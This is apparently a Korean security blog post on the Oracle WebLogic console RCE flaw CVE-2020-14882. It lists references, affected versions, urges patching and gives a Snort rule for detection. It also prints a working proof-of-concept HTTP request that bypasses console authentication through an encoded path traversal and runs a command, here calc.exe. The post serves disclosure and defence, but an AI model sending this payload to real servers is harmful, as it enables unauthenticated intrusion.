티스토리 뷰

728x90
반응형

[CVE 취약점] Oracle Weblogic 원격코드 실행 취약점(CVE-2020-14882)


참조

https://www.boannews.com/media/view.asp?idx=92226

https://blog.alyac.co.kr/3341?category=750247

https://blog.csdn.net/xuandao_ahfengren/article/details/109364543

https://blog.csdn.net/weixin_45728976/article/details/109359771?utm_medium=distribute.pc_relevant.none-task-blog-title-2&spm=1001.2101.3001.4242

https://www.youtube.com/watch?v=JFVDOIL0YtA&feature=emb_title&ab_channel=NguyenJang

https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf

https://www.youtube.com/watch?v=JFVDOIL0YtA&feature=emb_title&ab_channel=NguyenJang


Poc 

GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22) HTTP/1.1
Host: 192.168.56.1:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

Cookie: ADMINCONSOLESESSION=oz9zj-pQ0RS3h_Z2ZZ-HPUvS8f4Bal_ykFA3pcg_vJLBgwBP2bP1!2145697388; wp-settings-time-1=1601959792; JSESSIONID=iedzd4-y34Xmgc9Ws4JP8NiWdbUDmrt3BbDSY9MKX1hOmVaP6JYC!2145697388 


개요

Oracle WebLogic의 취약점을 악용하는 공격코드가 인터넷에 공개되어 있어 적극적인 보안 업데이트 필요

 ※ WebLogic 은 미국 Oracle Corporation에서 생산하는 응용 프로그램 서버

  - WebLogic 은 대규모 분산 웹 응용 프로그램, 네트워크 응용 프로그램 및 데이터베이스 응용 프로그램을 개발, 통합, 배포 및 관리하기위한 Java 응용 프로그램 서버


원격 공격자는 HTTP인증없이 우회하기 하거나 임의의 코드를 실행할 수 있는 공격  WebLogic Server Console.

  - CVE-2020-14883 취약점 원격 공격자 특별한 구성 할 수 HTTP비인증 인계의 경우, 요청 WebLogic Server Console 임의의 코드를 실행


영향 받는 제품 버전

10.3.6.0.0

12.1.3.0.0

12.2.1.3.0

12.2.1.4.0

14.1.1.0.0


Oracle WebLogic Server 원격코드 실행 보안 업데이트(CVE-2019-2890)

동일 취약버전에 대한 Weblogic 취약점


Snort  

alert tcp any any -> any 7001 (sid:1; gid:1; flow:established,to_server; uricontent:"/console/images/"; nocase; content:"java.lang"; nocase;
http_raw_uri; msg:"Oracle Weblogic RCE_CVE-2020-14882";)





728x90
반응형
댓글
댓글쓰기 폼
반응형
250x250
공지사항
«   2020/12   »
    1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31    
Total
167,463
Today
4